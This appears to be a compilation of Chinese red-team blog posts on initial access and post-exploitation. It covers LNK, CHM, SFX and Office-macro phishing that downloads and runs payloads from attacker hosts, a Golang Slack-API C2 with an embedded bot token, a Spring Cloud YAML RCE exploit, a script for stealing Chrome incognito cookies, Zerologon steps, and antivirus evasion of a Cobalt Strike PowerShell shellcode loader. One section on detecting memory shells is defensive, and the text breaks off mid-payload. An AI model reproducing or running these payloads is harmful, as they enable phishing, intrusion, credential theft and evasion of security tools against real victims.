在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式，由于本人只是个安服仔，接触的比较少（但也不能不学），就有了这篇文章，参考各位大佬的姿势总结一下。

钓鱼手段

Lnk（快捷方式）

可以在“⽬标”栏写⼊⾃⼰的恶意命令，如powershell上线命令等，这里举例为CMD

当我点击谷歌浏览器时，弹出了CMD

可以进行更改图标

• 快速生成lnk样本

$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"  
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\ascotbe.exe');&cmd /c .\\ascotbe.exe"  
$Shortcut.Save()

运行

powershell -ExecutionPolicy RemoteSigned -file test.ps1

• Tips

目标文件位置所能显示最大字符串为260个，所有我们可以把执行的命令放在260个字符后面

$file = Get-Content ".\test.txt"  
$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"  
$Shortcut.Arguments = '                                                                                                                                                                                                                                      '+ $file  
$Shortcut.Save()

文件后缀RTLO

他会让字符串倒着编码

• 用Python一键生成用，把txt改为png后缀

import os  
os.rename('test.txt', 'test-\u202egnp.txt')

import os
os.rename('cmd.exe', u'no\u202eFDP.exe')

CHM文档

创建一个文件夹（名字随意），在文件夹里面再创建两个文件夹（名字随意）和一个index.html文件，在两个文件夹内部创建各创建一个index.html文件。然后先将下列代码复制到根文件夹中的index.html中

• 在index.html文件中编辑

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

• 使用cs生成修改模版中的calc.exe

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.100:81/a'))">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

• 使用EasyCHM编译

• 原有模版CMD

• ps上线

自解压

• 使用CS生成木马

• 创建自解压文件

• 高级自解压选项

• 解压路径-绝对路径

• 提取后运行

• 静默模式

• 更新模式

• 修改文件名

ResourceHacker

• 打开flash安装文件导出资源

• 替换资源文件

• 上线

office宏

本地加载

• 新建word，创建宏

• cs生成宏粘贴

• 保存为启用宏的文档

• 打开文档上线

远程加载

编写一个带有宏代码的DOTM文档，并启用一个http服务将DOTM放置于web下

• 新建一个任意的模版的docx文档并且解压

• 编辑settings.xml.rels文件中的Target为我们第一个DOTM的http地址

• 重新压缩改后缀名为.docx

• 模拟点击上线

参考

https://www.ascotbe.com/2020/07/26/office_0x01/#LNK%E9%92%93%E9%B1%BC

https://paper.seebug.org/1329/

利用winrar自解压捆版payload制作免杀钓鱼木马

We found an Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned.

The PoC ⬇️ pic.twitter.com/LfvbyBUhF5

— PT SWARM (@ptswarm) October 13, 2020

配置slack

注册账号什么的就不说了。访问 https://api.slack.com/ 点击 Start Building

创建一个app

左侧OAuth & Permissions -> Scopes 配置token权限，暂时先配置两个，之后用哪个再加。

然后往上翻点Install App to Workspace

点allow，然后会自动跳转到token界面，记住这个token。

xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S

创建一个channel

记住你的channel链接https://app.slack.com/client/T01C58MD8L9/C01BS6GEUJH中的C01BS6GEUJH

通过 /invite @myslackbot把bot加到频道里。

然后在https://api.slack.com/methods是操作bot的所有api，先用https://api.slack.com/methods/conversations.history/test测试下获取聊天记录

配置好token和channel ID

点test之后获取到聊天记录

简单的流程知道了，接下来通过golang来操作api，以及编写我们的C2。

golang编写

package main

import (
    "fmt"
    "github.com/tidwall/gjson"
    "io/ioutil"
    "net/http"
    "os"
    "os/exec"
    "strings"
    "time"
)

const (
    History_api = "https://slack.com/api/conversations.history"
    PostMessage = "https://slack.com/api/chat.postMessage"
    Token       = "xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S"
    Channel     = "C01BS6GEUJH"
)

func main() {
    for true {
        time.Sleep(time.Second * 10)
        result := getHistory()
        if strings.HasPrefix(result.Str, "shell") {
            cmdRes := ExecCommand(strings.Split(result.Str, " ")[1])
            putRes(cmdRes)
        } else if strings.HasPrefix(result.Str, "exit") {
            os.Exit(0)
        } else {
            fmt.Println("no command")
        }
    }
}

func getHistory() (result gjson.Result) {
    req, err := http.NewRequest("GET", History_api, nil)
    if err != nil {
        return gjson.Result{}
    }
    q := req.URL.Query()
    q.Add("token", Token)
    q.Add("channel", Channel)
    q.Add("pretty", "1")
    q.Add("limit", "1")
    req.URL.RawQuery = q.Encode()

    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        return gjson.Result{}
    }
    defer resp.Body.Close()
    byte, _ := ioutil.ReadAll(resp.Body)
    result = gjson.GetBytes(byte, "messages.0.text")
    return
}

func putRes(res string) {
    req, err := http.NewRequest("POST", PostMessage, nil)
    if err != nil {
        return
    }
    p := req.URL.Query()
    p.Add("token", Token)
    p.Add("channel", Channel)
    p.Add("pretty", "1")
    p.Add("text", res)
    req.URL.RawQuery = p.Encode()
    resp, err := http.DefaultClient.Do(req)
    defer resp.Body.Close()
    if err != nil {
        return
    }

}

func ExecCommand(command string) (out string) {
    cmd := exec.Command(command)
    o, err := cmd.CombinedOutput()

    if err != nil {
        out = fmt.Sprintf("shell run error: n%sn", err)
    } else {
        out = fmt.Sprintf("combined out:n%sn", string(o))
    }
    return
}

看下效果

https://www.bilibili.com/video/BV1uk4y1C7oP/

自己偷偷摸摸实现了很多功能，就不放了，通过slack的API可以做很多事情。

而在使用certutil base64通过echo写文件时，echo会在每行的末尾追加一个空格，加上http传输的URL编码问题，有一些傻逼环境总是decode时候出错，而且一些几十几百k的文件，一行一行echo实在是拉跨。所以用powershell配合bp的爆破模块来写文件，然后 certutil -decode 就完事了，轻松省心。

powershell -c "'a' | Out-File C:\1.txt -Append"

写文件的时候通过bp的爆破模块去单线程写入文件，举一个请求包的例子。

/login HTTP/1.1
Host: baidu.com

cmd=powershell -c "'§§' | Out-File C:\1.txt -Append"

设置参数

设置certutil encode的txt字典

勾上URL编码

设置单线程，你也可以设置每次请求之后sleep 1秒。

冲完之后落地到目标的txt文件和本地的txt文件hash一致，decode之后的文件hash仍然一致。

本地还原文件的hash

落地到目标还原之后的文件hash

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

https://github.com/Y4er/yaml-payload

README

利用条件：
– 可以 POST 请求目标网站的 /env 接口设置属性
– 可以 POST 请求目标网站的 /refresh 接口刷新配置（存在 spring-boot-starter-actuator 依赖）
– 目标依赖的 spring-cloud-starter 版本 < 1.3.0.RELEASE
– 目标可以请求攻击者的 HTTP 服务器（请求可出外网）

仅在JDK1.8及Spring1.x测试通过,其他版本自测.

利用方法如下：

编译class文件然后打jar包

cd yaml-payload
javac src/artsploit/AwesomeScriptEngineFactory.java -cp ./lib
javac src/artsploit/Tunnel.java -cp ./lib
javac src/artsploit/GameInfo.java -cp ./lib
jar -cvf yaml-payload.jar -C src/ .

托管 yml 和 jar 文件

在自己控制的vps机器上开启一个简单HTTP服务器，端口尽量使用常见HTTP服务端口（80、443）

# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

在网站根目录下放置后缀为yml的文件yaml-payload.yml,内容如下:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/yaml-payload.jar"]
  ]]
]

在网站根目录下放置打包好的yaml-payload.jar

设置spring.cloud.bootstrap.location属性

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/yaml-payload.yml

刷新配置

POST /refresh
Content-Type: application/x-www-form-urlencoded

访问注入的shell

1. reGeorg: http://localhost:9092/api/v1/tunnel
2. cmd shell: http://localhost:9092/api/v1/game POST:code=whoami

参考

1. https://github.com/LandGrey/SpringBootVulExploit
2. https://www.anquanke.com/post/id/198886
3. https://github.com/artsploit/yaml-payload

在某些工作需求中，需要获取用户当前浏览器中的Cookies。由于目标比较严谨，使用了chrome浏览器的无痕模式，因此无法通过复制cookies文件解密的方式获取明文cookie。

那么，隐私模式真的可以保护你的cookie了吗？

Chrome架构

Chrome浏览器是多进程架构，有三种进程–浏览器、渲染器和插件。这也是为什么打开浏览器后默认就有6个进程的原因。

如果想详细了解架构可以参考下面提供的链接，简单来说就是Chrome会启动一个叫做“浏览器”的主进程，其余的“渲染器”进程就是每一个标签页。（这里简单理解一下，后面会利用到这个技术）

参考

Google 图解这个系列文章挺好的建议读一读。
Google 图解：Chrome 快是有原因的，科普浏览器架构
一种多核浏览器中进程复用的方法及其多核浏览器

方案一：remote debug

chrome内核的浏览器支持远程调试，但是仅支持本地访问（localhost:9222）。通过--remote-debugging-port=9222参数指定端口启动chrome内核浏览器，即可通过localhost:9222页面同步其他浏览进程。

由于chrome内核的浏览器是多进程架构，只有一个浏览器主进程，其余的都是渲染器插件等进程，因此只要第一个启动的进程是通过remot debug方式启动，后面的一切新的标签都会被调试模式记录，重点是包括隐私窗口！

自动化获取指定网站cookie

简单说一下怎么利用，首先要通过你的远控kill掉所有的chrome进程，并通过命令行启动一个无窗口debug模式的浏览器。目标顶多会以为浏览器bug闪退，并且无弹窗不会引起怀疑。下面是一些用的到的命令。

$ wmic process where name="chrome.exe" get executablepath
获取chrome浏览器所在目录
$ taskkill /f /im chrome.exe && chrome.exe --remote-debugging-port=xxxx --no-startup-window
kill掉所有chrome进程，并重新启动无窗口浏览器。利用命令一中获取的路径执行启动命令
$ frpc.exe
端口转发到外网，剩下的就是利用脚本读取指定网站cookie（换成自己c2的ip和端口）。python3 cookies.py localhost:9222

读cookies的脚本源码

import websockets
import asyncio
import requests
import json
from sys import argv

async def getCookies(uri):
    data = {"id": 1, "method": "Network.getCookies"}
    command = json.dumps(data)
    async with websockets.connect(uri) as websocket:
        await websocket.send(command)
        res = await websocket.recv()
        print(f" {res}")

def getUri(url):
    rep = requests.get(url)
    dic = json.loads(rep.text)
    res = {}
    for i in range(len(dic)):
        title = dic[i]['title']
        wsuri = dic[i]['webSocketDebuggerUrl']
        res[str(i)] = wsuri
        print(str(i)+". "+title)
    return res

def main(uri):
    while 1:
        cmd = input("> ")
        if cmd=="quit":
            break
        asyncio.get_event_loop().run_until_complete(getCookies(uri[cmd]))



if __name__ == '__main__':
    url = "http://"+argv[1]+"/json"
    uri = getUri(url)
    main(uri)

参考

Stealing Chrome Cookies
Chrome DevTools

方案二：NetLog

这个也是一个不错的方案，但是我并没有解决无窗口模式的问题，所以容易引起警觉，因此简单说聊一下，具体可以看参考文章。
同样需要先k掉chrome进程，通过命令行指定参数 --log-net-log="C:1.json"，利用NetLog Viewer导入json，读取cookie。

参考

使用 Chrome NetLog 解析隱藏在 DevTools 中的 Header 資訊

方案三：DLL注入HOOK

同事也在研究的一个思路，同时某位表哥也给了我同样的思路。由于这部分的技术本人还很欠缺，因此不过多研究了。大致的思路是，HOOK某函数在浏览器https加密之前，获取明文cookie。希望后面可以填坑。

适用性

所有Chrome内核浏览器皆适用，比如最新的edge，360Chrome等等 : )。想测的话，可以自己测一下。

最终

感谢提供netlog和dll注入思路的表哥，虽然最后一种还在研究中，但学习到了很多。前两种方式也不过是临时方案，方案三才是长久之计。这篇文章只是聊一个思路，给和我同样在某些取证环节需要此方法的人，毕竟大部分同行的工作并不需要这么做。所以按需阅读，谢谢。最后，请遵守法律！

我在WINDOWS7虚拟机下搭建的Tomcat，搭建教程网上都有，点击startup.bat启动环境

注入内存马

这里使用了哥斯拉的内存马

查杀方式一：VisualVM（远程调试）

设置jstatd.all.policy 文件

启动jstatd

jstatd.exe -J-Djava.security.policy=jstatd.all.policy -J-Djava.rmi.server.hostname=serverip

设置JVM Connection 修改 catalina.sh文件(LINUX)

JAVA_OPTS="-Djava.rmi.server.hostname=服务器的ip
-Dcom.sun.management.jmxremote
-Dcom.sun.management.jmxremote.port=jmx使用的端口
-Dcom.sun.management.jmxremote.ssl=false
-Dcom.sun.management.jmxremote.authenticate=false $JAVA_OPTS"
export JAVA_OPTS

修改catalina.bat文件(WINDOWS)

set JAVA_OPTS=-Djava.rmi.server.hostname=192.168.67.115 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=8888 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false

下载VisualVM

MBeans安装插件

连接远程Tomcat

检查异常攻击痕迹Filter/Servlet节点

在Servlet节点中我发现到了自己设置的内存马test.ico，说明已经检测到了内存马

查杀方式二：arthas

arthas是Alibaba开源的Java诊断工具
https://github.com/alibaba/arthas

下载

文档地址 https://arthas.aliyun.com/doc/quick-start.html

非常Nice的工具，深入用法请查看使用文档，这里只检测探测一下

启动（选择对应tocmat进程pid）

mbean(查看 Mbean 的信息，查看异常Filter/Servlet节点)

mbean | grep "Servlet"

sc (查看JVM已加载的类信息)

sc xxx.* 模糊搜索类
sc -d

查看payload加载的类信息

查看x.AES_BASE64类加载的类信息

jad(反编译指定已加载类的源码)

jad 类名

还有很多用法值得慢慢学习～

查杀方式三：Copagent

由于VisualVM在环境中可能还需要配置JVM Connection远程调试，我在长亭一篇文章中发现了LandGrey师傅所写的内存马检测工具，经过在本地Tomcat测试，可以检测到我自己设置的内存马，而无需重启Tomcat服务（重启了内存马不就没了吗?）先贴上Git地址

https://github.com/LandGrey/copagent

我本地运行Tomcat服务，使用cop.jar工具，工具首先会识别你正在运行的应用列举出来由你自己选择ID，运行后会在.copagent目录生成结果

在输出结果中，可以查看异常类，例如我的1.jsp和X.AES_BASE64，他会显示所有运行的类以及危险等级，比较高的可以进入目录查看代码进行分析

在java或class文件夹会保存木马以及运行的类

参考

1. https://mp.weixin.qq.com/s/DRbGeVOcJ8m9xo7Gin45kQ
2. https://qiita.com/shimizukawasaki/items/5dc9fe780ffbf3a7699c

Requires the latest impacket from GitHub with added netlogon structures.

Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this!

More info and original research here

Exploit steps

• Read the blog/whitepaper above so you know what you’re doing
• Run cve-2020-1472-exploit.py with IP and netbios name of DC
• DCSync with secretsdump, using -just-dc and -no-pass or empty hashes and the DCHOSTNAME$ account

Restore steps

If you make sure that this line in secretsdump passes (so make it if True: for example) secretsdump will also dump the plaintext (hex encoded) machine account password from the registry. You can do this by running it against the same DC and using a DA account.

Alternatively you can dump this same password by first extracting the registry hives and then running secretsdump offline (it will then always print the plaintext key because it can’t calculate the Kerberos hashes, this saves you modifying the library).

With this password you can run restorepassword.py with the -hexpass parameter. This will first authenticate with the empty password to the same DC and then set the password back to the original one. Make sure you supply the netbios name and IP again as target, so for example:

python restorepassword.py testsegment/s2016dc@s2016dc -target-ip 192.168.222.113 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3...etc

rdrleakdiag.exe

Microsoft Windows Resource Leak Diagnostic

默认存在的系统：

另外有师傅测试2008没有该exe文件，2016存在。没有的情况可以选择传一个上去。

使用方法

rdrleakdiag.exe /p <pid> /o <outputdir> /fullmemdmp /wait 1

会产生两个文件，results_+进程pid+.hlk，minidump_+进程pid+.dmp。

每次开机只能执行一次，需要重启再次执行。

出处

Grzegorz Tworek@0gtweet

生成ps1文件

直接被秒杀

查看ps1文件内容

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuzPCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYWdISCPSjo+ES2wU5Cgo213ELAxTtcW3jLu2wxoB6+UI1pFe5QtKWRU99qnU40ltkm4SJWul7EPpOTmEw8D9FoKGywVALdsr5/A64cQyI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRMYA3RsdBUXGAN3UUpHRk1XDBYNExgDTlBNA2xTV0pOSllGR2pmGxhmbXZwCi4pI0yC0OUolAOECPlYzqpBnQz7WW5QCeVDOUPi3jjqnNGtp39q5f+kjLoCc0ea2hQetsYnPTlO7F+Q2xLQoTQyuC6QkIc6jSOgRNCZUNmki6FueVN8TyaymGlWw0iU1mKbsd9yEZXVSd4LWWUzuNqocajn26otfu+C6wyuhUbBbU/zfNM17FzdXhsFmL/Dfed4HzTtP5Kjlvio07XFYjBMi4fls+sKijWkY6mssJu6hEaA5X4FcQmWHvqAQ8CKYv/wEJ15siNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhQRDRIVDRENGxsjMRd1Ww==')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}

把FromBase64String改成FromBase65String就不杀了，那就解决掉FromBase64String，直接改成byte数组。

改完之后

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}

[Byte[]]$var_code =  [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,179,60,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,97,103,72,72,35,210,142,143,132,75,108,20,228,40,40,219,93,196,44,12,83,181,197,183,140,187,182,195,26,1,235,229,8,214,145,94,229,11,74,89,21,61,246,169,212,227,73,109,146,110,18,37,107,165,236,67,233,57,57,132,195,192,253,22,130,134,203,5,64,45,219,43,231,240,58,225,196,50,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,19,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,24,3,78,80,77,3,108,83,87,74,78,74,89,70,71,106,102,27,24,102,109,118,112,10,46,41,35,76,130,208,229,40,148,3,132,8,249,88,206,170,65,157,12,251,89,110,80,9,229,67,57,67,226,222,56,234,156,209,173,167,127,106,229,255,164,140,186,2,115,71,154,218,20,30,182,198,39,61,57,78,236,95,144,219,18,208,161,52,50,184,46,144,144,135,58,141,35,160,68,208,153,80,217,164,139,161,110,121,83,124,79,38,178,152,105,86,195,72,148,214,98,155,177,223,114,17,149,213,73,222,11,89,101,51,184,218,168,113,168,231,219,170,45,126,239,130,235,12,174,133,70,193,109,79,243,124,211,53,236,92,221,94,27,5,152,191,195,125,231,120,31,52,237,63,146,163,150,248,168,211,181,197,98,48,76,139,135,229,179,235,10,138,53,164,99,169,172,176,155,186,132,70,128,229,126,5,113,9,150,30,250,128,67,192,138,98,255,240,16,157,121,178,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,20,17,13,18,21,13,17,13,27,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}

卡巴斯基没秒杀，放vt上看看

https://www.virustotal.com/gui/file/d73117a43cd10b5f8672b5440c9466d82d8df13a2d23f05171017ec442f8bacf/detection

看来还是有别的关键字，再改一改

Set-StrictMode -Version 2

$DoIt = @'
function func_b {
    Param ($amodule, $aprocedure)       
    $aunsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.Uns'+'afeN'+'ativeMethods')
    $agpa = $aunsafe_native_methods.GetMethod('GetP'+'rocAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $agpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($aunsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($amodule)))), $aprocedure))
}

function func_a {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $aparameters,
        [Parameter(Position = 1)] [Type] $areturn_type = [Void]
    )

    $atype_b = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Reflect'+'edDel'+'egate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDeleg'+'ateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $atype_b.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $aparameters).SetImplementationFlags('Runtime, Managed')
    $atype_b.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $areturn_type, $aparameters).SetImplementationFlags('Runtime, Managed')

    return $atype_b.CreateType()
}

[Byte[]]$acode =  [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,179,60,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,97,103,72,72,35,210,142,